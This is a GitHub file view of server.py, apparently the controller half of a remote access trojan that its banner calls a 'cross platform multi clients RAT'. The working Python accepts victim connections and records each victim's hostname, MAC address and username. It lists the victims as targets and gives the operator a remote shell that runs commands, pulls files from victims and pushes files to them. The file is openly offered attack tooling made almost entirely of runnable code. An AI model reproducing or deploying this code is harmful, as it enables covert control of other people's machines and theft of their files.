-
Notifications
You must be signed in to change notification settings - Fork 20
/
server.py
178 lines (176 loc) · 6.9 KB
/
server.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
import socket
import json
import threading
import platform
import os
print("[*] Checking Requirements Module.....")
if platform.system().startswith("Windows"):
try:
from pystyle import *
except ImportError:
os.system("python -m pip install pystyle -q -q -q")
from pystyle import *
elif platform.system().startswith("Linux"):
try:
from pystyle import *
except ImportError:
os.system("python3 -m pip install pystyle -q -q -q")
from pystyle import *
banner = Center.XCenter(r"""
***********************************************************************
* ________ _______ _ _ ____ ____ _ _______ *
* / / _ \ \ / / ___| | | | _ \ | _ \ / \|_ _\ \ *
* | || |_) \ V /| |_ | | | | | | |_____| |_) | / _ \ | | | | *
* < < | __/ | | | _| | |_| | |_| |_____| _ < / ___ \| | > > *
* | ||_| |_| |_| \___/|____/ |_| \_\/_/ \_\_| | | *
* \_\ /_/ *
* CROSS PLATFORM MULTI CLIENTS RAT *
* Coded By: Machine1337 *
************************************************************************
""")
os.system("cls||clear")
print(Colorate.Vertical(Colors.green_to_yellow, banner, 2))
ips = []
client_usernames = {}
targets = []
connections = {}
def recv_data(target):
data = ''
while True:
try:
data = data + target.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def send_data(target, data):
jsondata = json.dumps(data)
target.send(jsondata.encode())
def download_file(target, file_name):
f = open(file_name, 'wb')
target.settimeout(1)
chunk = target.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = target.recv(1024)
except socket.timeout as e:
break
target.settimeout(None)
f.close()
def upload_file(target, file_name):
f = open(file_name, 'rb')
target.send(f.read())
#coded By Machine1337....If u like the tool...Follow me on github: @machine1337
def shell(target, ip):
while True:
command = input(Colors.yellow+"\n[*] Shell@%s " % str(ip))
send_data(target, command)
if command == 'q':
break
if command == 'help':
print(Colorate.Vertical(Colors.red_to_purple, """
**** SHELL COMMANDS MAIN MENU ****
1. download filename | Download File From Client
2. upload filename | upload file To the Client
3. q | Back To The Server Main Menu
4. kill | Terminate the client shell
More Features Will Be Added
Follow:- github.com/machine1337
""", 2))
elif command[:8] == "download":
download_file(target, command[9:])
elif command[:6] == 'upload':
upload_file(target, command[7:])
elif command == 'kill':
target.close()
targets.remove(target)
ips.remove(ip)
break
else:
message = recv_data(target)
print(message)
def server():
global clients, connections
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
while True:
if stop_threads:
break
s.settimeout(1)
try:
target, ip = s.accept()
if ip[0] in connections:
target.close()
else:
info = recv_data(target)
hostname, mac_address, username = info.split(',')
client_data = {'HostName': hostname, 'MAC_Address': mac_address, 'Username': username}
client_usernames[ip[0]] = client_data
targets.append(target)
ips.append(ip)
connections[ip[0]] = target
print(Colors.green+"{} ({}:{}) has connected!".format(username, ip[0], ip[1])+"\n[*] Server Command (Type help):- ",end="")
clients += 1
except socket.timeout:
continue
except KeyboardInterrupt:
break
print(Colors.red+"\n[*] Server shutting down...")
for target in targets:
target.close()
s.close()
def listclients():
print("\n--------------------------------------------------------------------------------------")
print("SESSIONS | HOSTNAME | MAC ADDRESS | USERNAME | IP ADDRESS")
for count, ip in enumerate(ips):
if ip[0] in client_usernames:
target_info = client_usernames[ip[0]]
print("{:<10}|{:<12} {:<15} {:<11} {}:{}".format(count, target_info['HostName'],
target_info['MAC_Address'],
target_info['Username'], ip[0],
str(ip[1])))
else:
print(
"{:<10}|{:<12} {:<15} {:<11} {}:{}".format(count, 'Unknown', 'None', 'Unknown',
ip[0], str(ip[1])))
count += 1
print("---------------------------------------------------------------------------------------")
def selectclient():
try:
num = int(command[8:])
tarnum = targets[num]
tarip = ips[num]
shell(tarnum, tarip)
except:
print(Colors.red+"\n[*] No session id under that number")
if __name__ == '__main__':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("127.0.0.1", 4444)) # change ur ip and port here
s.listen(5)
clients = 0
stop_threads = False
print(Colors.yellow+"\n[*] Server Listening On: ")
t1 = threading.Thread(target=server)
t1.start()
try:
while True:
command = input(Colorate.Vertical(Colors.green_to_yellow, "\n[*] Server Command (Type help):- ", 2))
if command == "targets":
listclients()
elif command == "help":
print(Colorate.Vertical(Colors.red_to_purple, """
**** SERVER COMMANDS MAIN MENU ****
1. targets ---> Display Connected Clients
2. session ---> go to specific client shell like session 0
3. exit ---> Terminate the server
""", 2))
elif command[:7] == "session":
selectclient()
elif command == "exit":
stop_threads = True
t1.join()
break
except KeyboardInterrupt:
stop_threads = True
t1.join()
#coded By Machine1337....If u like the tool...Follow me on github: @machine1337